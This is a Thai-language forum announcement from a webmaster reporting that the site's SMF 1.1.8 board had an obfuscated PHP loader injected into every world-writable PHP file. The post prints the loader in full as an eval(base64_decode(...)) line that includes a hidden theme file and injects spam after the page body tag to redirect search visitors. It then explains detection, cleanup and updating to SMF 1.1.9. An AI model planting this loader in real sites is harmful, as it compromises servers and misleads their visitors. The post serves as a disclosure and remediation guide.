News & Public Relation > Announcement

เว๊บบอร์ด SMF ถูก script injection ด้วยการฝังโค้ดทุกไฟล์ที่เป็น php

(1/1)

Webmaster:
เว๊บบอร์ด ที่ทางเว๊บใช้ SMF 1.1.8 ได้ถูก script injection ด้วยโค้ด spam

โค้ดที่ถูกฝัง ตามโค้ดด้านล่าง


--- Code: ---
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9hbnlwdXBjby9wdWJsaWNfaHRtbC9hLWNvcnNvdGFsay9iYi9UaGVtZXMvc2NyaWJibGVzMTEvaW1hZ2VzL2ltZy9pbWcvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL2FueXB1cGNvL3B1YmxpY19odG1sL2EtY29yc290YWxrL2JiL1RoZW1lcy9zY3JpYmJsZXMxMS9pbWFnZXMvaW1nL2ltZy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>


--- End code ---

ซึ่งจะติดทุกไฟล์ที่ CMOD ไว้ ที่ 777 จากดูวันที่ไฟล์ถูกฝังโค้ด เมื่อวันที่ 18.5.09  ไฟล์ที่ถูกฝังจะเป็นเฉพาะไฟล์ นามสกุล php เท่านั้น  และยังมีการสร้างไฟล์แปลกปลอมใน folder  "language" อีกด้วย

ผลกระทบจากโค้ดดังกล่าวจะมีการ redirect web ไปยัง web ที่โค้ดกำหนด เมื่อมีการเข้ามาทาง search engine   เริ่ม redirect จากเว๊บ pearch.net แล้วส่งต่อไปที่ click-go.net หรือ ferdax.com หน้าตาเว๊บจะคล้ายกับ google search engine มาก

วิธีสังเกตว่า เว๊บของท่านถูกฝังโค้ดหรือไม่ ให้ เข้าเว๊บบอร์ด แล้ว วิว ดู ซอสโค้ด จะเห็นว่ามี  tag ที่ spam ทำการ generate ขึ้นมา อยู่หลัง <body>

วิธีแก้ไขให้ลบโค้ดดังกล่าวออกจากไฟล์ php ทุกไฟล์ที่ถูกฝังโค้ดนี้ให้หมด ครับ และลบไฟล์ที่แปลกปลอมทุกไฟล์ที่สร้างมาจากโค้ดดังกล่าว ใน folder  "language"

และทำการ อัพเดท เว๊บบอร์ด เป็น เวอร์ชั่นล่าสุด เพื่ออุดช่องโหว่  SMF 1.1.9

วันนี้ (4.6.09) ได้ทำการแก้ไขและลบโค้ดที่ฝังทุกตัวแล้วครับ นั่งลบด้วยมือครับ เหนื่อยเรย หุหุ (หาสาเหตุตั้งนาน)

Navigation

[0] Message Index

Go to full version